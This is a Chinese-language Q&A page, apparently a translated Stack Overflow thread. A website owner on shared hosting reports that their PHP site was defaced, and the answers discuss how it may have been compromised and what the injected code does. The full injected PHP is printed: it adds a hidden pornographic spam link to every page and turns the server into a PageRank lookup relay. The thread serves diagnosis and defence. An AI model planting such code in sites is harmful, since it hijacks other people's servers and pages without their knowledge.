我有godaddy共享主机,该网站被污损。谁的错?该网站是用PHP创建的,这个人可以通过我的网站上的某些可用性进入并修改文件吗?还是整个服务器端都是那个godaddy不够安全?
这是在文件中注入的内容。它做了什么?
<?php
//{{1311051f
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
$links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></SPAN>';
preg_match("|</body>|si",$str,$arr);
return str_replace($arr[0],$links.$arr[0],$str);
}
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
else
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}
//}}75671d8f
?>
答案 0 :(得分:9)
有可能是您在网站上使用的软件包(例如phpBB,phpNuke等)中的漏洞,人们抓取网络寻找易受攻击的主机并利用它们可以使用的软件包。该代码是开源的,随时可用,因此除了使用最新版本之外,您无法做很多保护。
像PacketStormSecurity这样的公司让“skript kiddies”很容易找到一个PoC(概念证明)脚本,他们会自己在每个网站上尝试它。有些像crafted google query一样容易找到潜在目标列表。您可以在日志中查找导致漏洞攻击的GET网址,但最佳情况是尽可能保持最新状态,并且永远不要依赖主机进行恢复备份您的网站。
答案 1 :(得分:1)
这个黑客的真正目标是:http://frazierit.com/blog/?p=103
没有SQL注入,没有秘密,这些人正在听电线,或者某些机器上有一个代理,你使用按键传递键盘,而你使用明文密码FTP来处理你的网站。他们获得了对您网站的FTP访问权限,并系统地将代码注入您网站上的.php和.html页面。他们正在通过众多ISP构建/建立分页测试人员的分布式网络。可能要验证SEO操作。易于清理,只需要一些命令行正则表达式工作。
-DREW
答案 2 :(得分:0)
该脚本允许某人使用变量xxxprch指定脚本的URL。它检查URL的哈希,以确保它符合某些标准,并在谷歌搜索URL。然后检查搜索结果中是否有“rank_”字样,并获取“rank_”后面的下一个9个字符并返回它们以显示在用户屏幕上。
如果用户没有在xxxprch中指定变量,那么它会自动写入页面链接到色情网站。
注意:如果您获得虚拟专用服务器(可以找到每月3美元便宜),您可以安装mod_security,以防止许多类型的攻击。另一方面,您需要保持操作系统最新。
答案 3 :(得分:-7)
我不想这样说,但你有错。 SQL / HTML / JS /代码注入是您负责处理的责任。选择强密码也很关键。任何人都可以找到漏洞并做任何事情。
看起来代码是注入链接并以某种方式获取Google页面排名。
我认为它属于实用程序员的原则之一:
``select''没有破碎很少见 在OS或编译器中找到错误, 甚至是第三方产品或 图书馆。这个bug最有可能出现在 应用
将OS /编译器/第三方库替换为共享主机。